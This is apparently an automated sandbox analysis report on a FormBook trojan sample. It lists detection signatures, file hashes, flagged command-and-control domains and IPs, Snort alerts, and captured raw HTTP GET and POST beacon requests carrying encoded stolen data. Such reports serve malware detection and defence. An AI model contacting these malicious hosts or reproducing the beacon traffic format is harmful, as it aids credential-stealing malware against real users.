Windows Analysis Report
SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
Analysis ID: 830750
MD5: c7714b273571ba64c0b77afca236ac6d
SHA1: c24d9460bee8a724abe8b0dcf3d74851dd5737ed
SHA256: e62c1e809c48e66104c34ae3e977b82fbea2e984dee708bda431b608c2774c28
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection

Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe ReversingLabs: Detection: 42%
Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Virustotal: Detection: 42%
Source: Yara match File source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: http://www.energyservicestation.com/u2kb/?pJ=y0bMVGhK3R&s7=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuNRicmmGgsJT37Uw== Avira URL Cloud: Label: malware
Source: http://www.avisrezervee.com/u2kb/www.avisrezervee.com Avira URL Cloud: Label: malware
Source: http://www.thedivinerudraksha.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.gritslab.com/u2kb/www.gritslab.com Avira URL Cloud: Label: malware
Source: http://www.thewildphotographer.co.uk/u2kb/www.thewildphotographer.co.uk Avira URL Cloud: Label: malware
Source: http://www.white-hat.uk/u2kb/www.white-hat.uk Avira URL Cloud: Label: malware
Source: http://thedivinerudraksha.com/u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7l Avira URL Cloud: Label: malware
Source: http://www.bitservicesltd.com/u2kb/?pJ=y0bMVGhK3R&s7=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7Wl2JIBHu0WW9vDmQ== Avira URL Cloud: Label: malware
Source: http://www.thedivinerudraksha.com/u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pi0eI0K5lBX7KNLg== Avira URL Cloud: Label: malware
Source: http://www.energyservicestation.com/u2kb/www.energyservicestation.com Avira URL Cloud: Label: malware
Source: http://www.un-object.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.energyservicestation.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.younrock.com/u2kb/?s7=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKq8rTPQW1vWIa2Wug==&pJ=y0bMVGhK3R Avira URL Cloud: Label: malware
Source: http://www.thewildphotographer.co.uk/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.white-hat.uk/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.bitservicesltd.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.fclaimrewardccpointq.shop/u2kb/www.fclaimrewardccpointq.shop Avira URL Cloud: Label: malware
Source: http://www.222ambking.org/u2kb/www.222ambking.org Avira URL Cloud: Label: malware
Source: http://www.gritslab.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.fclaimrewardccpointq.shop/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.gritslab.com/u2kb/?s7=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZjx8zjtO3/lmb0Gg==&pJ=y0bMVGhK3R Avira URL Cloud: Label: malware
Source: http://www.younrock.com/u2kb/?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4c Avira URL Cloud: Label: malware
Source: http://www.shapshit.xyz/u2kb/?s7=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBtiTAOJDfFAse6Fg==&pJ=y0bMVGhK3R Avira URL Cloud: Label: malware
Source: http://www.un-object.com/u2kb/?pJ=y0bMVGhK3R&s7=pRDkJdNDOVoQCU+9NHQShuJ8RlIM2fjCZpxzdvjpnmqfDHzh6n+FGyromdVZx0/+Z3ctR0ZwX+ep4hJ0NBR+2QmcJmTx4hb/kQ== Avira URL Cloud: Label: malware
Source: http://www.un-object.com/u2kb/www.un-object.com Avira URL Cloud: Label: malware
Source: http://white-hat.uk/u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr Avira URL Cloud: Label: malware
Source: http://www.thedivinerudraksha.com/u2kb/www.thedivinerudraksha.com Avira URL Cloud: Label: malware
Source: http://www.fclaimrewardccpointq.shop Avira URL Cloud: Label: malware
Source: http://www.white-hat.uk/u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3tklxZoaLCmex8cw== Avira URL Cloud: Label: malware
Source: http://www.shapshit.xyz/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.ecomofietsen.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.avisrezervee.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.germanreps.com/u2kb/www.germanreps.com Avira URL Cloud: Label: malware
Source: http://www.younrock.com/u2kb/www.younrock.com Avira URL Cloud: Label: malware
Source: http://www.222ambking.org/u2kb/?s7=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUesQZcBXW4MNpIrrg==&pJ=y0bMVGhK3R Avira URL Cloud: Label: malware
Source: http://www.germanreps.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.222ambking.org/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.shapshit.xyz/u2kb/www.shapshit.xyz Avira URL Cloud: Label: malware
Source: http://www.younrock.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.ecomofietsen.com/u2kb/www.ecomofietsen.com Avira URL Cloud: Label: malware
Source: http://www.bitservicesltd.com/u2kb/www.bitservicesltd.com Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe ReversingLabs: Detection: 38%
Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Joe Sandbox ML: detected
Source: 3.2.vfpbkeeo.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.vfpbkeeo.exe.2080000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: vfpbkeeo.exe, 00000001.00000003.309270547.000000001A050000.00000004.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000001.00000003.309553217.0000000019EC0000.00000004.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000003.314888267.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000A9F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.351980250.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.353912435.000000000356E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.000000000381F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.0000000003700000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: vfpbkeeo.exe, 00000003.00000002.353773506.0000000002670000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: vfpbkeeo.exe, vfpbkeeo.exe, 00000003.00000003.314888267.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000A9F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.351980250.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.353912435.000000000356E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.000000000381F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.0000000003700000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: vfpbkeeo.exe, 00000003.00000002.353773506.0000000002670000.00000040.10000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D74
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Code function: 0_2_0040699E FindFirstFileW,FindClose, 0_2_0040699E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_004089B8 FindFirstFileExW, 1_2_004089B8

Networking

Source: C:\Windows\explorer.exe Network Connect: 85.187.128.34 80
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.94 80
Source: C:\Windows\explorer.exe Network Connect: 45.33.30.197 80
Source: C:\Windows\explorer.exe Domain query: www.un-object.com
Source: C:\Windows\explorer.exe Domain query: www.energyservicestation.com
Source: C:\Windows\explorer.exe Network Connect: 78.141.192.145 80
Source: C:\Windows\explorer.exe Domain query: www.white-hat.uk
Source: C:\Windows\explorer.exe Domain query: www.thewildphotographer.co.uk
Source: C:\Windows\explorer.exe Domain query: www.shapshit.xyz
Source: C:\Windows\explorer.exe Network Connect: 81.17.18.198 80
Source: C:\Windows\explorer.exe Network Connect: 192.185.17.12 80
Source: C:\Windows\explorer.exe Domain query: www.thedivinerudraksha.com
Source: C:\Windows\explorer.exe Network Connect: 199.192.30.147 80
Source: C:\Windows\explorer.exe Domain query: www.bitservicesltd.com
Source: C:\Windows\explorer.exe Domain query: www.younrock.com
Source: C:\Windows\explorer.exe Domain query: www.gritslab.com
Source: C:\Windows\explorer.exe Network Connect: 161.97.163.8 80
Source: C:\Windows\explorer.exe Domain query: www.222ambking.org
Source: C:\Windows\explorer.exe Domain query: www.fclaimrewardccpointq.shop
Source: C:\Windows\explorer.exe Network Connect: 94.176.104.86 80
Source: C:\Windows\explorer.exe Network Connect: 213.145.228.111 80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49696 -> 94.176.104.86:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49696 -> 94.176.104.86:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49696 -> 94.176.104.86:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49702 -> 91.195.240.94:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49702 -> 91.195.240.94:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49702 -> 91.195.240.94:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49706 -> 81.17.18.198:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49706 -> 81.17.18.198:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49706 -> 81.17.18.198:80
Source: C:\Windows\explorer.exe DNS query: www.shapshit.xyz
Source: Joe Sandbox View ASN Name: A2HOSTINGUS A2HOSTINGUS
Source: Joe Sandbox View ASN Name: SEDO-ASDE SEDO-ASDE
Source: global traffic HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3tklxZoaLCmex8cw== HTTP/1.1 Host: www.white-hat.uk Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?s7=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZjx8zjtO3/lmb0Gg==&pJ=y0bMVGhK3R HTTP/1.1 Host: www.gritslab.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7Wl2JIBHu0WW9vDmQ== HTTP/1.1 Host: www.bitservicesltd.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?s7=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUesQZcBXW4MNpIrrg==&pJ=y0bMVGhK3R HTTP/1.1 Host: www.222ambking.org Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuNRicmmGgsJT37Uw== HTTP/1.1 Host: www.energyservicestation.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?s7=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKq8rTPQW1vWIa2Wug==&pJ=y0bMVGhK3R HTTP/1.1 Host: www.younrock.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=pn+zaWXo7szcfRSxpZYFMSllMpP2ulP+x3705F5u21IqvN9WG9kcUa2nxvPm1UX5MTo8dUhpuHauDgBRPTa7tLWBUGjKVRCVBQ== HTTP/1.1 Host: www.thewildphotographer.co.uk Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?s7=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBtiTAOJDfFAse6Fg==&pJ=y0bMVGhK3R HTTP/1.1 Host: www.shapshit.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pi0eI0K5lBX7KNLg== HTTP/1.1 Host: www.thedivinerudraksha.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=pRDkJdNDOVoQCU+9NHQShuJ8RlIM2fjCZpxzdvjpnmqfDHzh6n+FGyromdVZx0/+Z3ctR0ZwX+ep4hJ0NBR+2QmcJmTx4hb/kQ== HTTP/1.1 Host: www.un-object.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 85.187.128.34 85.187.128.34
Source: Joe Sandbox View IP Address: 91.195.240.94 91.195.240.94
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.gritslab.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.gritslab.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gritslab.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 28 66 71 54 47 58 66 5f 6b 4e 50 63 28 71 42 41 48 34 79 65 65 47 71 37 51 76 76 30 28 4b 48 6e 55 46 49 79 6f 36 46 44 47 79 4f 78 31 52 43 64 68 42 69 47 5a 54 69 70 36 4d 43 78 41 63 47 79 67 38 32 47 4b 76 51 30 79 71 62 56 46 4d 4f 67 5a 46 52 4d 6a 4a 7e 30 73 66 28 38 7a 79 58 7a 66 6e 39 50 4a 59 77 36 54 47 71 44 36 43 4e 68 44 53 6d 4f 36 4a 42 39 58 68 68 45 7a 70 39 37 45 71 79 67 43 70 6c 45 44 6a 74 62 50 61 61 41 41 54 74 76 34 66 34 75 37 70 38 65 72 6f 7a 68 30 45 50 6d 71 51 64 56 7e 6e 34 49 4a 41 62 6a 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=(fqTGXf_kNPc(qBAH4yeeGq7Qvv0(KHnUFIyo6FDGyOx1RCdhBiGZTip6MCxAcGyg82GKvQ0yqbVFMOgZFRMjJ~0sf(8zyXzfn9PJYw6TGqD6CNhDSmO6JB9XhhEzp97EqygCplEDjtbPaaAATtv4f4u7p8erozh0EPmqQdV~n4IJAbjng).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.bitservicesltd.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.bitservicesltd.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bitservicesltd.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 6d 70 57 4d 4e 78 6e 56 5a 4e 73 76 41 38 57 70 67 5a 41 47 36 57 4f 48 65 36 42 39 76 69 70 59 43 68 71 6c 70 35 61 38 68 32 67 6d 59 35 67 43 6c 64 4d 76 76 66 57 4b 5a 37 52 57 5a 77 79 35 4c 76 33 6e 4d 67 6c 50 31 58 37 68 48 55 4b 31 65 59 4f 54 6b 75 49 34 42 39 55 38 49 63 69 44 7e 52 31 52 35 65 4c 5a 54 62 69 53 72 46 61 6f 57 53 46 55 30 2d 30 6e 67 69 6b 76 74 54 68 53 41 58 46 30 31 57 6f 61 4d 64 32 6c 73 6c 56 70 4c 30 52 56 4c 37 45 30 34 56 7e 66 70 77 52 37 35 5a 35 7a 4c 65 5a 50 61 4c 66 76 62 74 35 59 52 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=mpWMNxnVZNsvA8WpgZAG6WOHe6B9vipYChqlp5a8h2gmY5gCldMvvfWKZ7RWZwy5Lv3nMglP1X7hHUK1eYOTkuI4B9U8IciD~R1R5eLZTbiSrFaoWSFU0-0ngikvtThSAXF01WoaMd2lslVpL0RVL7E04V~fpwR75Z5zLeZPaLfvbt5YRg).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.222ambking.orgConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.222ambking.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.222ambking.org/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 46 47 38 4a 49 54 32 5f 67 71 76 79 72 37 63 7a 65 61 49 6e 5a 49 58 77 38 52 49 64 45 76 4d 46 44 59 49 65 55 47 56 63 52 36 57 64 42 46 66 4f 6e 65 6b 48 57 2d 59 56 41 51 76 68 79 6e 57 59 6f 55 50 34 6b 4e 72 75 41 38 74 4f 76 6b 28 51 66 44 65 79 43 34 35 4b 57 48 49 4b 55 62 4e 32 37 58 73 31 48 41 28 50 43 46 44 7a 6f 4b 47 33 38 69 38 46 6e 57 35 76 6e 65 4b 69 58 6a 64 51 35 2d 4f 6d 58 48 7e 46 4a 31 6e 47 62 68 6e 31 61 45 57 42 75 66 6e 4f 76 55 34 51 45 52 4d 49 7e 45 72 71 76 43 53 5f 30 5a 37 67 50 4f 67 77 36 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=FG8JIT2_gqvyr7czeaInZIXw8RIdEvMFDYIeUGVcR6WdBFfOnekHW-YVAQvhynWYoUP4kNruA8tOvk(QfDeyC45KWHIKUbN27Xs1HA(PCFDzoKG38i8FnW5vneKiXjdQ5-OmXH~FJ1nGbhn1aEWBufnOvU4QERMI~ErqvCS_0Z7gPOgw6Q).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.energyservicestation.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.energyservicestation.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.energyservicestation.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 46 49 52 64 59 4b 38 32 4c 68 41 7a 31 6a 42 33 4d 78 4e 54 5a 6f 4c 64 69 36 69 51 50 5a 64 42 37 56 4f 57 36 76 53 4f 54 32 4c 61 66 36 66 4f 31 72 61 75 7e 68 75 74 79 65 6a 42 31 62 6f 6c 75 31 59 42 73 6e 75 4c 70 4c 6b 45 76 38 46 47 58 5a 79 74 41 6e 46 72 76 55 34 70 51 42 6e 46 56 52 68 76 52 55 43 4c 59 6d 6f 52 45 39 50 41 28 7a 37 32 68 6f 61 6e 42 61 74 51 43 34 59 39 71 5f 30 32 76 54 6a 6a 4e 41 4b 46 55 37 73 48 62 36 70 36 4c 4a 65 5a 28 51 66 4f 71 5a 31 74 50 46 49 30 53 72 65 66 77 55 32 64 6e 74 64 44 6a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=FIRdYK82LhAz1jB3MxNTZoLdi6iQPZdB7VOW6vSOT2Laf6fO1rau~hutyejB1bolu1YBsnuLpLkEv8FGXZytAnFrvU4pQBnFVRhvRUCLYmoRE9PA(z72hoanBatQC4Y9q_02vTjjNAKFU7sHb6p6LJeZ(QfOqZ1tPFI0SrefwU2dntdDjQ).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.younrock.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.younrock.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.younrock.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 35 37 46 76 7a 66 53 6e 68 6b 4f 5f 28 4b 75 55 4d 55 59 6c 38 30 64 6c 58 73 45 77 53 69 63 55 38 56 68 69 33 71 5a 63 59 6d 44 72 4b 2d 45 35 4e 69 31 42 50 53 55 68 6c 46 68 74 36 6e 36 6e 57 64 50 4f 30 70 66 69 38 57 42 56 37 50 37 6d 61 4c 76 76 35 32 6a 39 43 31 6e 6f 49 62 36 4b 35 67 64 36 73 69 33 30 52 70 32 30 30 6f 71 58 58 74 53 6d 7e 64 34 48 50 35 69 45 72 39 46 46 6f 33 67 67 4b 70 75 79 48 6b 33 46 41 70 73 7a 62 4b 66 67 62 41 75 47 52 54 4e 32 71 37 50 4d 67 69 47 48 57 42 58 35 6a 6a 42 67 52 71 76 48 56 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=57FvzfSnhkO_(KuUMUYl80dlXsEwSicU8Vhi3qZcYmDrK-E5Ni1BPSUhlFht6n6nWdPO0pfi8WBV7P7maLvv52j9C1noIb6K5gd6si30Rp200oqXXtSm~d4HP5iEr9FFo3ggKpuyHk3FApszbKfgbAuGRTN2q7PMgiGHWBX5jjBgRqvHVA).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.thewildphotographer.co.ukConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.thewildphotographer.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thewildphotographer.co.uk/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 6b 6c 57 54 5a 69 48 63 31 4e 71 36 63 67 6a 71 31 4a 64 38 5a 52 4e 35 62 61 48 6c 79 46 44 35 30 69 7a 48 34 69 51 70 67 6e 64 39 74 4f 45 70 52 4e 64 78 51 36 65 46 70 74 66 47 30 45 66 4c 64 42 67 50 4b 55 51 57 68 56 6d 47 56 48 4a 41 57 68 65 50 37 75 4f 75 64 47 28 71 55 6a 43 4f 63 39 75 74 62 6d 51 7a 64 63 34 34 30 62 32 37 32 75 65 6a 56 66 43 6b 6d 61 51 45 32 66 75 55 28 58 53 79 77 79 76 78 44 77 52 31 63 2d 67 53 69 70 57 50 58 79 4d 4f 7e 58 67 34 51 4b 48 7a 43 42 4b 47 56 48 4e 35 68 5a 33 31 5a 4b 39 4b 55 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=klWTZiHc1Nq6cgjq1Jd8ZRN5baHlyFD50izH4iQpgnd9tOEpRNdxQ6eFptfG0EfLdBgPKUQWhVmGVHJAWheP7uOudG(qUjCOc9utbmQzdc440b272uejVfCkmaQE2fuU(XSywyvxDwR1c-gSipWPXyMO~Xg4QKHzCBKGVHN5hZ31ZK9KUA).
